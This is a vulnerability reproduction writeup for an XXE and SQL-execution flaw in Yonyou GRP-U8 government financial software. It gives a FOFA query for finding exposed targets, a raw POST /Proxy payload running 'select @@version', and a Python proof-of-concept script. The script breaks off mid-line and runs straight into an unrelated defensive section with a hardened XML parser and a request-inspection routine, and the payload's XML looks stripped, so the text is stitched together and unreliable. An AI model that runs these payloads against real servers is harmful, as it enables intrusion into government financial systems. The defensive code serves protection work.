1. Vulnerability description
Yonyou GRP-U8 is Yonyou's administrative and public-institution financial management software, a new-generation product built on cloud computing technology for the national e-government sector and one of the most widely used government financial management packages in China. GRP-U8 has been reported to contain an XXE vulnerability: the application parses XML input without restricting the loading of external entities, so malicious external files can be loaded, SQL statements can be executed, and in some cases system commands can be executed.
2. Affected versions
GRP-U8
3. Reproduction
1. Environment setup: FOFA query
title="GRP-U8"
2. Reproduction (1): payload for executing a SQL statement
POST /Proxy HTTP/1.1
Host: xxx.xxx.xxx.xxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=25EDA97813692F4D1FAFBB74FD7CFFE0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 386

cVer=9.8.0&dp=XMLAS_DataRequestProviderNameDataSetProviderDataDataselect@@version
(2): script for executing the SQL statement
import re
import requests
import sys

if len(sys.argv) != 2:
    print("Usage: python poc.py url")
    print("example: python poc.py http://127.0.0.1:8080")
    sys.exit(1)

url = sys.argv[1]
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded",
}

def poc(url):
    url = url + '/Proxy'
    print(url)
    data = 'cVer=9.8.0&dp=XMLAS_DataRequestProviderNameDataSetProviderDataDataselect@@version'
    res = requests.post(url, headers=headers, data=data)
    res = res.text
    result_row = r'
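The root cause stated in the description above is an XML parser that accepts DOCTYPE/entity declarations and resolves external entities, with attacker-controlled SQL text riding along in the same XML. The following Python is an added example, not code from this writeup or from Yonyou: it shows the two defender-side controls that address this class of bug, a hardened parser that refuses DTDs and disables external entity resolution, and a simple inspection routine for the form body shape shown in the request above (cVer=...&dp=<xml>). The /Proxy body layout, the field name dp, and the sample bodies are assumptions or constructed test data, not captured traffic.

```python
import io
import re
import xml.sax
from xml.sax import handler
from urllib.parse import parse_qs

# Indicators for the two behaviours the report describes arriving in the
# XML body: DOCTYPE/ENTITY declarations (XXE) and SQL text such as the
# "select @@version" probe in the page's payload. Constructed patterns.
DTD_RE = re.compile(r"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)
SQL_RE = re.compile(r"\b(?:select|insert|update|delete|exec)\b|@@\w+", re.IGNORECASE)


class _Collector(handler.ContentHandler):
    """Collects element names and character data so callers can see what was parsed."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.chunks = []

    def startElement(self, name, attrs):
        self.tags.append(name)

    def characters(self, content):
        self.chunks.append(content)


def has_dtd(xml_text):
    """True if the document declares a DOCTYPE or ENTITY; reject it before parsing."""
    return DTD_RE.search(xml_text) is not None


def parse_xml_hardened(xml_text):
    """Parse untrusted XML with DTDs refused and external entity fetching disabled.

    Returns (list_of_element_names, concatenated_text).
    """
    if has_dtd(xml_text):
        raise ValueError("DOCTYPE/ENTITY declarations are not accepted")
    parser = xml.sax.make_parser()
    # Defence in depth: even if a DTD slipped through, never resolve
    # external general or parameter entities.
    parser.setFeature(handler.feature_external_ges, False)
    parser.setFeature(handler.feature_external_pes, False)
    coll = _Collector()
    parser.setContentHandler(coll)
    parser.parse(io.StringIO(xml_text))
    return coll.tags, "".join(coll.chunks)


def inspect_proxy_body(form_body):
    """Return findings for one application/x-www-form-urlencoded request body.

    Assumes the request shape on the page: cVer=...&dp=<xml>. An empty list
    means nothing suspicious was seen in the dp field.
    """
    findings = []
    fields = parse_qs(form_body, keep_blank_values=True)
    for dp in fields.get("dp", []):
        if has_dtd(dp):
            findings.append("dp contains DOCTYPE/ENTITY declaration (possible XXE)")
        if SQL_RE.search(dp):
            findings.append("dp contains SQL keywords (possible injection)")
    return findings


# Constructed sample bodies (URL-encoded), not captured traffic.
SAMPLE_BENIGN = "cVer=9.8.0&dp=%3CR%3E%3CD%3Eabc%3C%2FD%3E%3C%2FR%3E"
SAMPLE_DTD = "cVer=9.8.0&dp=%3C%21DOCTYPE+r+%5B%3C%21ENTITY+e+%22x%22%3E%5D%3E%3Cr%3E%26e%3B%3C%2Fr%3E"
SAMPLE_SQL = "cVer=9.8.0&dp=%3CR%3E%3CD%3Eselect+%40%40version%3C%2FD%3E%3C%2FR%3E"

if __name__ == "__main__":
    for label, body in [("benign", SAMPLE_BENIGN), ("dtd", SAMPLE_DTD), ("sql", SAMPLE_SQL)]:
        print(label, inspect_proxy_body(body))
    print(parse_xml_hardened("<R><D>abc</D></R>"))
```

Refusing any DOCTYPE up front is the simplest fix for an endpoint that only ever needs plain element/text XML; the parser feature flags are kept as a second layer in case a future code path accepts DTDs. The inspection routine is the kind of check a WAF rule or a request-logging hook would apply to the same dp field, and it flags the SQL probe independently of whether entity declarations are present.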